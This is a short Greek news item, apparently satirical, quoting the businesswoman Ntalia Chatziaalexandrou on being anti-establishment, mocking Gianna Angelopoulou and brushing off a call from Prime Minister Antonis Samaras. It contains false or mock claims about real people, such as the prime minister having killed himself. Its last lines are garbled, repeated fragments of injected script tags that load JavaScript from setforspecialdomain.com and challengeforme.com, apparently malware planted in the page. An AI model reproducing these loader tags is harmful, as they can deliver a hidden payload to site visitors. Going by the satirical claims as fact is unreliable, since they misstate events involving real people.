Ντάλια Χατζηαλεξάνδρου: “Είμαι αντισυστημική”

«Απέναντι στο σύστημα» δηλώνει και η πάμπλουτη επιχειρηματίας Ντάλια Χατζηαλεξάνδου σε συνέντευξή της στο 4news.gr και τη Βίκυ Κουλούρη.

Η κα Χατζηαλεξάνδου, σχολιάζει τις πρόσφατες δηλώσεις της κυρίας Γιάννας Αγγελοπούλου Δασκαλάκη και θυμίζει “Εγώ τα έβαλα με τον πρωθυπουργό και κέρδισα. Η κυρία Αγγελοπούλου, πότε τα έβαλε με το σύστημα”;

«Ένας πραγματικά αντισυστημικός άνθρωπος, όπως εγώ, δεν μπορεί να καταλάβει τη διαφορά ανάμεσα σε ένα μωβ χαρτονόμισμα και σε ένα κίτρινο. Νομίζω ότι όλα είναι ίδια», σημειώνει μεταξύ άλλων.

Μάλιστα, η κυρία Χατζηαλεξάνδρου, αποκάλυψε ότι το λόγο που αρνήθηκε ραντεβού με τον πρωθυπουργό κύριο Αντώνη Σαμαρά: “Με παίρνει ένας κύριος τηλέφωνο και μου λέει ότι είναι ο πρωθυπουργός της Ελλάδας. Σκέφτηκα, καλά πόσους πρωθυπουργούς έχουμε (μιας και ήξερα ότι ο πρωθυπουργός της Ελλάδας αυτοκτόνησε μετά από τις αποκαλύψεις μας). Δεν είπα τίποτα όμως… Μου πρότεινε να συναντηθούμε τη Δευτέρα στις 16:30. Ααα, στις 16:30 δεν γίνεται, του λέω, γιατί βλέπουμε το Χουάνα η Παρθένα εκείνη την ώρα…!! Και το έκλεισα. Δεν με πήρε ποτέ ξανά τηλέφωνο, αυτός ο κύριος”.

Σχετικά με μία πιθανή πρόταση προς αυτήν για την προεδρία της Δημοκρατίας απαντά: «Τι είναι ο πρόεδρος της Δημοκρατίας; ».___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >